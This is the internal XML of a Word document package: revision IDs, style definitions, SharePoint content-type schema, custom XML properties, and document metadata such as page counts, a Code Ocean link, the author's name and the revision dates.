    <w:rsid w:val="00D757A5"/>
    <w:rsid w:val="00D75ACB"/>
    <w:rsid w:val="00D763E6"/>
    <w:rsid w:val="00D76668"/>
    <w:rsid w:val="00D76DE8"/>
    <w:rsid w:val="00D76F61"/>
    <w:rsid w:val="00D77934"/>
    <w:rsid w:val="00D77E3A"/>
    <w:rsid w:val="00D80212"/>
    <w:rsid w:val="00D802F1"/>
    <w:rsid w:val="00D8047B"/>
    <w:rsid w:val="00D80D1A"/>
    <w:rsid w:val="00D81089"/>
    <w:rsid w:val="00D8219B"/>
    <w:rsid w:val="00D829AA"/>
    <w:rsid w:val="00D82F93"/>
    <w:rsid w:val="00D836D2"/>
    <w:rsid w:val="00D84AF1"/>
    <w:rsid w:val="00D86815"/>
    <w:rsid w:val="00D86FD8"/>
    <w:rsid w:val="00D91348"/>
    <w:rsid w:val="00D91616"/>
    <w:rsid w:val="00D92D79"/>
    <w:rsid w:val="00D93295"/>
    <w:rsid w:val="00D93728"/>
    <w:rsid w:val="00D94418"/>
    <w:rsid w:val="00D94854"/>
    <w:rsid w:val="00D94B02"/>
    <w:rsid w:val="00D95523"/>
    <w:rsid w:val="00D95695"/>
    <w:rsid w:val="00D95BE8"/>
    <w:rsid w:val="00D96F77"/>
    <w:rsid w:val="00D9729D"/>
    <w:rsid w:val="00D977ED"/>
    <w:rsid w:val="00D97BB8"/>
    <w:rsid w:val="00DA1153"/>
    <w:rsid w:val="00DA11EC"/>
    <w:rsid w:val="00DA23FD"/>
    <w:rsid w:val="00DA2607"/>
    <w:rsid w:val="00DA2985"/>
    <w:rsid w:val="00DA2F22"/>
    <w:rsid w:val="00DA36F9"/>
    <w:rsid w:val="00DA47B6"/>
    <w:rsid w:val="00DA495B"/>
    <w:rsid w:val="00DA59F5"/>
    <w:rsid w:val="00DA5CD2"/>
    <w:rsid w:val="00DA6060"/>
    <w:rsid w:val="00DA6191"/>
    <w:rsid w:val="00DA6642"/>
    <w:rsid w:val="00DA6BE1"/>
    <w:rsid w:val="00DA78CD"/>
    <w:rsid w:val="00DB1160"/>
    <w:rsid w:val="00DB1E96"/>
    <w:rsid w:val="00DB7395"/>
    <w:rsid w:val="00DB7549"/>
    <w:rsid w:val="00DB76BA"/>
    <w:rsid w:val="00DC037E"/>
    <w:rsid w:val="00DC03F7"/>
    <w:rsid w:val="00DC12BC"/>
    <w:rsid w:val="00DC1EC3"/>
    <w:rsid w:val="00DC26C1"/>
    <w:rsid w:val="00DC2878"/>
    <w:rsid w:val="00DC2900"/>
    <w:rsid w:val="00DC2F2D"/>
    <w:rsid w:val="00DC33ED"/>
    <w:rsid w:val="00DC3A4F"/>
    <w:rsid w:val="00DC3FE1"/>
    <w:rsid w:val="00DC4299"/>
    <w:rsid w:val="00DC5794"/>
    <w:rsid w:val="00DC58EB"/>
    <w:rsid w:val="00DC5A0F"/>
    <w:rsid w:val="00DC61A4"/>
    <w:rsid w:val="00DC7B3D"/>
    <w:rsid w:val="00DD0F5D"/>
    <w:rsid w:val="00DD1DFA"/>
    <w:rsid w:val="00DD3A52"/>
    <w:rsid w:val="00DD4736"/>
    <w:rsid w:val="00DD5352"/>
    <w:rsid w:val="00DD5A88"/>
    <w:rsid w:val="00DD5F1A"/>
    <w:rsid w:val="00DD5FE8"/>
    <w:rsid w:val="00DD602C"/>
    <w:rsid w:val="00DD638D"/>
    <w:rsid w:val="00DD6ABA"/>
    <w:rsid w:val="00DD7111"/>
    <w:rsid w:val="00DE13E7"/>
    <w:rsid w:val="00DE2573"/>
    <w:rsid w:val="00DE4301"/>
    <w:rsid w:val="00DE47CE"/>
    <w:rsid w:val="00DE5E68"/>
    <w:rsid w:val="00DE7256"/>
    <w:rsid w:val="00DF00BB"/>
    <w:rsid w:val="00DF015F"/>
    <w:rsid w:val="00DF06AC"/>
    <w:rsid w:val="00DF1D76"/>
    <w:rsid w:val="00DF2389"/>
    <w:rsid w:val="00DF292C"/>
    <w:rsid w:val="00DF42C9"/>
    <w:rsid w:val="00DF513F"/>
    <w:rsid w:val="00DF6BC7"/>
    <w:rsid w:val="00DF70B6"/>
    <w:rsid w:val="00DF7706"/>
    <w:rsid w:val="00E0023F"/>
    <w:rsid w:val="00E01C2D"/>
    <w:rsid w:val="00E020A5"/>
    <w:rsid w:val="00E04178"/>
    <w:rsid w:val="00E062E2"/>
    <w:rsid w:val="00E06FF6"/>
    <w:rsid w:val="00E07383"/>
    <w:rsid w:val="00E10A98"/>
    <w:rsid w:val="00E121C8"/>
    <w:rsid w:val="00E14CEE"/>
    <w:rsid w:val="00E14FEC"/>
    <w:rsid w:val="00E165BC"/>
    <w:rsid w:val="00E1666F"/>
    <w:rsid w:val="00E17578"/>
    <w:rsid w:val="00E212AA"/>
    <w:rsid w:val="00E2276B"/>
    <w:rsid w:val="00E245DD"/>
    <w:rsid w:val="00E30942"/>
    <w:rsid w:val="00E30A7A"/>
    <w:rsid w:val="00E30F45"/>
    <w:rsid w:val="00E316FA"/>
    <w:rsid w:val="00E326B0"/>
    <w:rsid w:val="00E33C01"/>
    <w:rsid w:val="00E3428D"/>
    <w:rsid w:val="00E346B5"/>
    <w:rsid w:val="00E34FA7"/>
    <w:rsid w:val="00E350F5"/>
    <w:rsid w:val="00E35391"/>
    <w:rsid w:val="00E36009"/>
    <w:rsid w:val="00E36EB3"/>
    <w:rsid w:val="00E415ED"/>
    <w:rsid w:val="00E41C9D"/>
    <w:rsid w:val="00E424CB"/>
    <w:rsid w:val="00E42908"/>
    <w:rsid w:val="00E42A91"/>
    <w:rsid w:val="00E43300"/>
    <w:rsid w:val="00E435DD"/>
    <w:rsid w:val="00E43DF1"/>
    <w:rsid w:val="00E44877"/>
    <w:rsid w:val="00E44D10"/>
    <w:rsid w:val="00E44E45"/>
    <w:rsid w:val="00E45089"/>
    <w:rsid w:val="00E450A4"/>
    <w:rsid w:val="00E464C4"/>
    <w:rsid w:val="00E47781"/>
    <w:rsid w:val="00E503AD"/>
    <w:rsid w:val="00E51323"/>
    <w:rsid w:val="00E5298C"/>
    <w:rsid w:val="00E53704"/>
    <w:rsid w:val="00E53B52"/>
    <w:rsid w:val="00E5591E"/>
    <w:rsid w:val="00E5595B"/>
    <w:rsid w:val="00E57F80"/>
    <w:rsid w:val="00E57FB9"/>
    <w:rsid w:val="00E60711"/>
    <w:rsid w:val="00E61A83"/>
    <w:rsid w:val="00E61E12"/>
    <w:rsid w:val="00E62441"/>
    <w:rsid w:val="00E62B48"/>
    <w:rsid w:val="00E63B40"/>
    <w:rsid w:val="00E648CE"/>
    <w:rsid w:val="00E65853"/>
    <w:rsid w:val="00E66527"/>
    <w:rsid w:val="00E667F6"/>
    <w:rsid w:val="00E670E8"/>
    <w:rsid w:val="00E6722A"/>
    <w:rsid w:val="00E67D26"/>
    <w:rsid w:val="00E705E4"/>
    <w:rsid w:val="00E70EF9"/>
    <w:rsid w:val="00E725E2"/>
    <w:rsid w:val="00E7592E"/>
    <w:rsid w:val="00E7596C"/>
    <w:rsid w:val="00E7614B"/>
    <w:rsid w:val="00E767BC"/>
    <w:rsid w:val="00E777B0"/>
    <w:rsid w:val="00E8120A"/>
    <w:rsid w:val="00E81DD1"/>
    <w:rsid w:val="00E83CD4"/>
    <w:rsid w:val="00E84236"/>
    <w:rsid w:val="00E853B4"/>
    <w:rsid w:val="00E857BB"/>
    <w:rsid w:val="00E8706F"/>
    <w:rsid w:val="00E87566"/>
    <w:rsid w:val="00E87777"/>
    <w:rsid w:val="00E878F2"/>
    <w:rsid w:val="00E90D8E"/>
    <w:rsid w:val="00E911AC"/>
    <w:rsid w:val="00E927AA"/>
    <w:rsid w:val="00E937C1"/>
    <w:rsid w:val="00E94580"/>
    <w:rsid w:val="00E958AF"/>
    <w:rsid w:val="00E96309"/>
    <w:rsid w:val="00E96C9D"/>
    <w:rsid w:val="00E971C2"/>
    <w:rsid w:val="00E971E6"/>
    <w:rsid w:val="00E97B5E"/>
    <w:rsid w:val="00EA00E8"/>
    <w:rsid w:val="00EA08FE"/>
    <w:rsid w:val="00EA43C8"/>
    <w:rsid w:val="00EA4ECB"/>
    <w:rsid w:val="00EA5DF4"/>
    <w:rsid w:val="00EA5F3F"/>
    <w:rsid w:val="00EB00B6"/>
    <w:rsid w:val="00EB1520"/>
    <w:rsid w:val="00EB1B85"/>
    <w:rsid w:val="00EB1E09"/>
    <w:rsid w:val="00EB2818"/>
    <w:rsid w:val="00EB31D9"/>
    <w:rsid w:val="00EB5ABE"/>
    <w:rsid w:val="00EB6960"/>
    <w:rsid w:val="00EC14CF"/>
    <w:rsid w:val="00EC2517"/>
    <w:rsid w:val="00EC257D"/>
    <w:rsid w:val="00EC36C6"/>
    <w:rsid w:val="00EC4F4C"/>
    <w:rsid w:val="00EC541C"/>
    <w:rsid w:val="00EC5FB9"/>
    <w:rsid w:val="00ED0149"/>
    <w:rsid w:val="00ED0B01"/>
    <w:rsid w:val="00ED0FF4"/>
    <w:rsid w:val="00ED21AA"/>
    <w:rsid w:val="00ED2D6E"/>
    <w:rsid w:val="00ED31A3"/>
    <w:rsid w:val="00ED5983"/>
    <w:rsid w:val="00ED7BC4"/>
    <w:rsid w:val="00EE0ECE"/>
    <w:rsid w:val="00EE1659"/>
    <w:rsid w:val="00EE44DD"/>
    <w:rsid w:val="00EE7F9D"/>
    <w:rsid w:val="00EF1BF2"/>
    <w:rsid w:val="00EF3700"/>
    <w:rsid w:val="00EF3764"/>
    <w:rsid w:val="00EF3793"/>
    <w:rsid w:val="00EF3DDF"/>
    <w:rsid w:val="00EF41B1"/>
    <w:rsid w:val="00EF41C4"/>
    <w:rsid w:val="00EF5577"/>
    <w:rsid w:val="00EF5B72"/>
    <w:rsid w:val="00EF5F55"/>
    <w:rsid w:val="00EF61BF"/>
    <w:rsid w:val="00EF64C4"/>
    <w:rsid w:val="00EF6BC8"/>
    <w:rsid w:val="00EF774B"/>
    <w:rsid w:val="00EF7806"/>
    <w:rsid w:val="00EF7DE3"/>
    <w:rsid w:val="00F01677"/>
    <w:rsid w:val="00F02086"/>
    <w:rsid w:val="00F0224F"/>
    <w:rsid w:val="00F02B79"/>
    <w:rsid w:val="00F03103"/>
    <w:rsid w:val="00F037A5"/>
    <w:rsid w:val="00F03C2F"/>
    <w:rsid w:val="00F05678"/>
    <w:rsid w:val="00F056D0"/>
    <w:rsid w:val="00F067E3"/>
    <w:rsid w:val="00F07290"/>
    <w:rsid w:val="00F079A7"/>
    <w:rsid w:val="00F10DDB"/>
    <w:rsid w:val="00F121F7"/>
    <w:rsid w:val="00F1233F"/>
    <w:rsid w:val="00F12715"/>
    <w:rsid w:val="00F12A46"/>
    <w:rsid w:val="00F1413F"/>
    <w:rsid w:val="00F1495C"/>
    <w:rsid w:val="00F156F1"/>
    <w:rsid w:val="00F16E09"/>
    <w:rsid w:val="00F16E7E"/>
    <w:rsid w:val="00F17271"/>
    <w:rsid w:val="00F17EE7"/>
    <w:rsid w:val="00F223B3"/>
    <w:rsid w:val="00F2280C"/>
    <w:rsid w:val="00F23158"/>
    <w:rsid w:val="00F23ECD"/>
    <w:rsid w:val="00F2514B"/>
    <w:rsid w:val="00F26871"/>
    <w:rsid w:val="00F26CC8"/>
    <w:rsid w:val="00F26D15"/>
    <w:rsid w:val="00F27062"/>
    <w:rsid w:val="00F271DE"/>
    <w:rsid w:val="00F3151D"/>
    <w:rsid w:val="00F31915"/>
    <w:rsid w:val="00F33CF9"/>
    <w:rsid w:val="00F3470C"/>
    <w:rsid w:val="00F37039"/>
    <w:rsid w:val="00F402E0"/>
    <w:rsid w:val="00F41FFB"/>
    <w:rsid w:val="00F428D3"/>
    <w:rsid w:val="00F45883"/>
    <w:rsid w:val="00F47E94"/>
    <w:rsid w:val="00F501FC"/>
    <w:rsid w:val="00F51243"/>
    <w:rsid w:val="00F51CD8"/>
    <w:rsid w:val="00F54630"/>
    <w:rsid w:val="00F548B2"/>
    <w:rsid w:val="00F55B47"/>
    <w:rsid w:val="00F565AD"/>
    <w:rsid w:val="00F56E13"/>
    <w:rsid w:val="00F57E22"/>
    <w:rsid w:val="00F6052A"/>
    <w:rsid w:val="00F61150"/>
    <w:rsid w:val="00F61C69"/>
    <w:rsid w:val="00F627DA"/>
    <w:rsid w:val="00F62923"/>
    <w:rsid w:val="00F62B16"/>
    <w:rsid w:val="00F632DE"/>
    <w:rsid w:val="00F63C4E"/>
    <w:rsid w:val="00F661DF"/>
    <w:rsid w:val="00F6675C"/>
    <w:rsid w:val="00F66A72"/>
    <w:rsid w:val="00F6715B"/>
    <w:rsid w:val="00F676D6"/>
    <w:rsid w:val="00F7043C"/>
    <w:rsid w:val="00F709FC"/>
    <w:rsid w:val="00F723B8"/>
    <w:rsid w:val="00F7288F"/>
    <w:rsid w:val="00F72AE0"/>
    <w:rsid w:val="00F73986"/>
    <w:rsid w:val="00F741C9"/>
    <w:rsid w:val="00F7475B"/>
    <w:rsid w:val="00F7479A"/>
    <w:rsid w:val="00F74E31"/>
    <w:rsid w:val="00F75A09"/>
    <w:rsid w:val="00F771DD"/>
    <w:rsid w:val="00F778AD"/>
    <w:rsid w:val="00F77BC3"/>
    <w:rsid w:val="00F80ABB"/>
    <w:rsid w:val="00F80DC7"/>
    <w:rsid w:val="00F8116C"/>
    <w:rsid w:val="00F82DB3"/>
    <w:rsid w:val="00F847A6"/>
    <w:rsid w:val="00F84F6D"/>
    <w:rsid w:val="00F86BDA"/>
    <w:rsid w:val="00F86E7D"/>
    <w:rsid w:val="00F86EB0"/>
    <w:rsid w:val="00F9001F"/>
    <w:rsid w:val="00F903AD"/>
    <w:rsid w:val="00F911A0"/>
    <w:rsid w:val="00F91676"/>
    <w:rsid w:val="00F92A54"/>
    <w:rsid w:val="00F92BCC"/>
    <w:rsid w:val="00F93999"/>
    <w:rsid w:val="00F9426B"/>
    <w:rsid w:val="00F9441B"/>
    <w:rsid w:val="00FA18D1"/>
    <w:rsid w:val="00FA29F8"/>
    <w:rsid w:val="00FA2DD6"/>
    <w:rsid w:val="00FA4C32"/>
    <w:rsid w:val="00FA7DF0"/>
    <w:rsid w:val="00FB020D"/>
    <w:rsid w:val="00FB07B3"/>
    <w:rsid w:val="00FB2058"/>
    <w:rsid w:val="00FB2797"/>
    <w:rsid w:val="00FB3188"/>
    <w:rsid w:val="00FB4531"/>
    <w:rsid w:val="00FB460C"/>
    <w:rsid w:val="00FB4BC5"/>
    <w:rsid w:val="00FB4DA7"/>
    <w:rsid w:val="00FB611B"/>
    <w:rsid w:val="00FB62D1"/>
    <w:rsid w:val="00FB66E2"/>
    <w:rsid w:val="00FC0A9C"/>
    <w:rsid w:val="00FC0C4F"/>
    <w:rsid w:val="00FC0E25"/>
    <w:rsid w:val="00FC1A9F"/>
    <w:rsid w:val="00FC1F6C"/>
    <w:rsid w:val="00FC206D"/>
    <w:rsid w:val="00FC2176"/>
    <w:rsid w:val="00FC2E50"/>
    <w:rsid w:val="00FC333D"/>
    <w:rsid w:val="00FC3666"/>
    <w:rsid w:val="00FC5259"/>
    <w:rsid w:val="00FC5ADD"/>
    <w:rsid w:val="00FC5C29"/>
    <w:rsid w:val="00FC6C7D"/>
    <w:rsid w:val="00FD2777"/>
    <w:rsid w:val="00FD378A"/>
    <w:rsid w:val="00FD47C6"/>
    <w:rsid w:val="00FD4884"/>
    <w:rsid w:val="00FD6C84"/>
    <w:rsid w:val="00FD6DAF"/>
    <w:rsid w:val="00FD7B3A"/>
    <w:rsid w:val="00FD7FD0"/>
    <w:rsid w:val="00FE0B2E"/>
    <w:rsid w:val="00FE15B1"/>
    <w:rsid w:val="00FE3994"/>
    <w:rsid w:val="00FE4E72"/>
    <w:rsid w:val="00FE7114"/>
    <w:rsid w:val="00FE73A4"/>
    <w:rsid w:val="00FE7958"/>
    <w:rsid w:val="00FF1134"/>
    <w:rsid w:val="00FF149A"/>
    <w:rsid w:val="00FF1DB1"/>
    <w:rsid w:val="00FF319E"/>
    <w:rsid w:val="00FF4179"/>
    <w:rsid w:val="00FF4446"/>
    <w:rsid w:val="00FF448C"/>
    <w:rsid w:val="00FF4A54"/>
    <w:rsid w:val="00FF4D01"/>
    <w:rsid w:val="00FF53A4"/>
    <w:rsid w:val="00FF5E32"/>
    <w:rsid w:val="00FF6669"/>
    <w:rsid w:val="00FF6966"/>
    <w:rsid w:val="00FF6B36"/>
    <w:rsid w:val="00FF6D97"/>
    <w:rsid w:val="00FF7487"/>
    <w:rsid w:val="52E8D1AF"/>
    <w:rsid w:val="7C5B23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FC7D30"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{6AFA6921-0F3E-4B25-A0ED-2831D042C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7"/>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styleId="Caption">
    <w:name w:val="caption"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="0093171F"/>
    <w:pPr>
      <w:spacing w:after="200"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="44546A" w:themeColor="text2"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="0010107D"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0010107D"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="000327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5289772">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1270430653">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="191084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codeocean.com/capsule/4989235/tr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F297BB8F7155CB44BB73B6E7091D1010" ma:contentTypeVersion="11" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="b056a34ff79a2891729e5f4750fdec62">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns3="a2056005-c975-4a3d-afcf-108f5c0c299c" xmlns:ns4="50ed3997-8b3e-4dfa-9278-d6f02d2f9e61" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="9621f464c05a77a82da2145e18d66d40" ns3:_="" ns4:_="">
    <xsd:import namespace="a2056005-c975-4a3d-afcf-108f5c0c299c"/>
    <xsd:import namespace="50ed3997-8b3e-4dfa-9278-d6f02d2f9e6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_activity" minOccurs="0"/>
                <xsd:element ref="ns4:MediaServiceAutoTags" minOccurs="0"/>
                <xsd:element ref="ns4:MediaServiceGenerationTime" minOccurs="0"/>
                <xsd:element ref="ns4:MediaServiceEventHashCode"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056005-c975-4a3d-afcf-108f5c0c299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ed3997-8b3e-4dfa-9278-d6f02d2f9e6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50ed3997-8b3e-4dfa-9278-d6f02d2f9e61"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2.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{EC597BD7-5FAB-4B1B-9489-C74805D61F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056005-c975-4a3d-afcf-108f5c0c299c"/>
    <ds:schemaRef ds:uri="50ed3997-8b3e-4dfa-9278-d6f02d2f9e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F4D69D-1A25-4569-825B-CA9A182BA1BA}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/2006/metadata/properties"/>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/infopath/2007/PartnerControls"/>
    <ds:schemaRef ds:uri="50ed3997-8b3e-4dfa-9278-d6f02d2f9e61"/>
  </ds:schemaRefs>
</ds:datastoreItem>
</file>

<file path=customXml/itemProps4.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{8C66593F-B8CB-4D1D-AAF8-541A139139A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13</Pages>
  <Words>6958</Words>
  <Characters>39665</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46530</CharactersWithSpaces>
  <SharedDoc>false</SharedDoc>
  <HLinks>
    <vt:vector size="6" baseType="variant">
      <vt:variant>
        <vt:i4>2949172</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>15</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://codeocean.com/capsule/4989235/tree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Zhang, Jeffrey (zhan4215@vandals.uidaho.edu)</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-12-13T03:13:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-02-22T06:13:00Z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0x010100F297BB8F7155CB44BB73B6E7091D1010</vt:lpwstr>
  </property>
</Properties>
</file>